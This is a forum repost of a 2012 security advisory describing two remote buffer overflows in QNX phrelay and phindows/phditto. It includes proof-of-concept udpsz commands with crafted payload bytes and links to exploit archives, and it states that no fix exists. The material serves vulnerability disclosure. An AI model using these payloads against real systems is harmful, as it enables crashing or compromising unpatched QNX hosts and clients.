Jump to content
The_Arhitect

QNX phrelay/phindows/phditto Multiple Vulnerabilities

By The_Arhitect, in Exploituri

Recommended Posts

The_Arhitect Newbie

The_Arhitect

Posted
Posted

QNX phrelay/phindows/phditto Multiple Vulnerabilities

#######################################################################

                             Luigi Auriemma

Application:  QNX phrelay/phindows/phditto
              http://www.qnx.com
              http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.phindows/topic/coverpage.html
              http://www.qnx.com/developers/docs/6.4.1/neutrino/utilities/p/phrelay.html
Versions:     current
Platforms:    QNX Neutrino RTOS and Windows
Bugs:         A] bpe_decompress stack overflow
              B] Photon Session buffer overflow
Exploitation: remote
              A] versus client and maybe server
              B] versus server
Date:         10 May 2012
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


phrelay and phindows/phditto are based on a private protocol that
allows to use the Photon graphical environment of the server (through
the phrelay inetd program) on another machine (phindows, phditto and
any other client).


#######################################################################

=======
2) Bugs
=======

--------------------------------
A] bpe_decompress stack overflow
--------------------------------

The BPE (byte pair encoding) compression uses two stack buffers of 256
bytes called "left" and "right".
The bpe_decompress function used in all the client/server programs of
this protocol is affected by a stack based buffer-overflow caused by
the lack of checks on the data sequentially stored in these two
buffers.


---------------------------------
B] Photon Session buffer overflow
---------------------------------

Buffer-overflow affecting phrelay in the handling of the device file
specified by the client as existing Photon session.


Note: considering that phrelay is not enabled by default and allows to
connect without authentication directly to /dev/photon (the screen
visible phisically on the machine) and phindows/phditto must be
manually pointed to the malicious host for exploiting bug A, this
advisory must be considered only a case study and nothing more.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
http://www.exploit-db.com/sploits/18864.zip


A]
at the moment I don't know how to call bpe_decompress on phrelay but I
have verified that the bpe_decompress function is vulnerable at 100%.
the following test works only on phindows/phditto (the proof-of-concept
acts as a server):

  udpsz -C "a5 00 00 01 0000 ffff" -b A -l 0 -T -1 0 4868 1+7+0xffff

B]
  udpsz -C "a5 10 00 00 0000 ffff   1400000008040100000000008002e0010000000000000000000000000000" -b A -T SERVER 4868 1+7+0xffff


#######################################################################

======
4) Fix
======


No fix.


#######################################################################

Sursa: QNX phrelay/phindows/phditto Multiple Vulnerabilities

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...